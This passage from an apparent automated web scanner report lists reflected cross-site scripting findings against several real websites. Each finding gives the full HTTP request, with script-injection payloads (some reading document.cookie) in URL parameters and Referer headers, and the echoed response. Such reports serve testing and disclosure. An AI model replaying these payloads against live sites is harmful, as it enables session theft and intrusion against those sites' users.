&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30f715b"><script>alert(1)</script>7dca66d889b&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

1.171. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf774"><script>alert(1)</script>55c550506ed was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30bf774"><script>alert(1)</script>55c550506ed&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30bf774"><script>alert(1)</script>55c550506ed&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.172. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3419"><script>alert(1)</script>8dc9eba3e21 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxa3419"><script>alert(1)</script>8dc9eba3e21&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:27:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxa3419"><script>alert(1)</script>8dc9eba3e21&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.173. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fa21"><script>alert(1)</script>f82fa5ba772 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM1fa21"><script>alert(1)</script>f82fa5ba772/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800+KPMAAfCd; na_tc=Y

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM1fa21"><script>alert(1)</script>f82fa5ba772/DLX/1673624573/x96/default/empty.gif/726348573830302b4b504d4141664364?x" target="_top"><IMG SRC
...[SNIP]...

1.174. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14b33"><script>alert(1)</script>29f506260ec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX14b33"><script>alert(1)</script>29f506260ec/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800+KPMAAfCd; na_tc=Y

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX14b33"><script>alert(1)</script>29f506260ec/1143833049/x96/default/empty.gif/726348573830302b4b504d4141664364?x" target="_top"><IMG SRC
...[SNIP]...

1.175. http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dbe3"><script>alert(1)</script>dc805862fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x963dbe3"><script>alert(1)</script>dc805862fa HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800+KPMAAfCd; na_tc=Y

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 318
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://mig.nexac.com/RealMedia/ads/click_lx.ads/B3DM/DLX/1142704585/x963dbe3"><script>alert(1)</script>dc805862fa/default/empty.gif/726348573830302b4b504d4141664364?x" target="_top"><IMG SRC=
...[SNIP]...

1.176. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload e0eaa<script>alert(1)</script>cd417b31ba9 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1297259925559&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-1076724771190722&slotname=blog_postpage_72890e0eaa<script>alert(1)</script>cd417b31ba9&page_slots=blog_postpage_72890&cookie_enabled=1&ga_vid=1798846169.1297259929&ga_sid=1297259929&ga_hid=1078606781&url=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blog.csdn.net/jiji262/archive/2007/07/28/1713771.aspx?3541f'style%3d'x%3aexpression(alert(1))'7b381ee316b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 09 Feb 2011 13:59:26 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 6631

GA_googleSetAdContentsBySlotForSync({"blog_postpage_72890e0eaa<script>alert(1)</script>cd417b31ba9":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#0
...[SNIP]...

1.177. http://redirectingat.com/api/ [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirectingat.com
Path:   /api/

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4f8b9<script>alert(1)</script>6deb514662f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/?callback=skimlinksApplyHandlers4f8b9<script>alert(1)</script>6deb514662f&data=%7B%22pubcode%22%3A%223912X635905%22%2C%22domains%22%3A%5B%22kara.allthingsd.com%22%2C%22biggovernment.com%22%2C%22googlemobile.blogspot.com%22%2C%22deadline.com%22%2C%22engadget.com%22%2C%22newyorker.com%22%2C%22mediadecoder.blogs.nytimes.com%22%2C%22krugman.blogs.nytimes.com%22%2C%22artsbeat.blogs.nytimes.com%22%2C%22ubergizmo.com%22%2C%22thinkprogress.org%22%2C%22telegraph.co.uk%22%2C%22ib.adnxs.com%22%2C%22twitter.com%22%2C%22twittorati.com%22%2C%22blogcritics.org%22%2C%22technoratimedia.com%22%2C%22indyposted.com%22%2C%22mixx.com%22%2C%22wesay.com%22%2C%22dailyblogtips.com%22%2C%22environmentalgraffiti.com%22%2C%22blastmagazine.com%22%2C%22justin.tv%22%2C%22stylecrave.com%22%2C%22triond.com%22%2C%22shrinktheweb.com%22%2C%22creativecommons.org%22%5D%7D HTTP/1.1
Host: redirectingat.com
Proxy-Connection: keep-alive
Referer: http://technorati.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:07:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
X-SKIM-Hostname: muttley.skimlinks.com
Content-Length: 90
Connection: close
Content-Type: text/html; charset=UTF-8


skimlinksApplyHandlers4f8b9<script>alert(1)</script>6deb514662f({"merchant_domains":[]});

1.178. http://s.intensedebate.com/images/twitter-favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/twitter-favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b455'><script>alert(1)</script>af37c82c065 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/twitter-favicon.ico2b455'><script>alert(1)</script>af37c82c065 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Wed, 09 Feb 2011 13:31:43 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4719

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/twitter-favicon.ico2b455'><script>alert(1)</script>af37c82c065'>
...[SNIP]...

1.179. http://s.intensedebate.com/themes/universal/images/idc-universal.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /themes/universal/images/idc-universal.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d738a'><script>alert(1)</script>2035d16e5c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/universal/images/idc-universal.pngd738a'><script>alert(1)</script>2035d16e5c6?=4 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1296494785.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; __qca=P0-1269071080-1296494784940; __utma=239309019.1543046413.1296494785.1296494785.1296494785.1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Wed, 09 Feb 2011 13:31:56 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4738

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/themes/universal/images/idc-universal.pngd738a'><script>alert(1)</script>2035d16e5c6?=4'>
...[SNIP]...

1.180. https://secure.watchmouse.com/assets/css/fancybox.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/fancybox.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59f42"><script>alert(1)</script>77fbf6c1c6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets59f42"><script>alert(1)</script>77fbf6c1c6c/css/fancybox.css HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:16 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-92c7ea61c53fe0856faf2aa9db8d7ac6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets59f42"><script>alert(1)</script>77fbf6c1c6c/css/fancybox.css" method="post">
...[SNIP]...

1.181. https://secure.watchmouse.com/assets/css/fancybox.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/fancybox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2665"><script>alert(1)</script>c61e86157ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/csse2665"><script>alert(1)</script>c61e86157ef/fancybox.css HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:19 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-29746f857df2caac146afc49fe4a6ccc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/csse2665"><script>alert(1)</script>c61e86157ef/fancybox.css" method="post">
...[SNIP]...

1.182. https://secure.watchmouse.com/assets/css/fancybox.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/fancybox.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b905"><script>alert(1)</script>e5c9d149996 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /assets/css/fancybox.css5b905"><script>alert(1)</script>e5c9d149996 HTTP/1.1
Host: secure.watchmouse.com
Connection: keep-alive
Referer: https://secure.watchmouse.com/en/?868a8'-alert(document.cookie)-'f02a060b98b=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.14.10.1297252772; nkey=WMA4D528314AD809

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:19:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-1bf23d5f9c7396d951419f162836f2af"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Keep-Alive: timeout=6, max=1000
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/assets/css/fancybox.css5b905"><script>alert(1)</script>e5c9d149996" method="post">
...[SNIP]...

1.183. https://secure.watchmouse.com/assets/css/print.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.watchmouse.com
Path:   /assets/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12604"><script>alert(1)</script>c91f43e7654 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

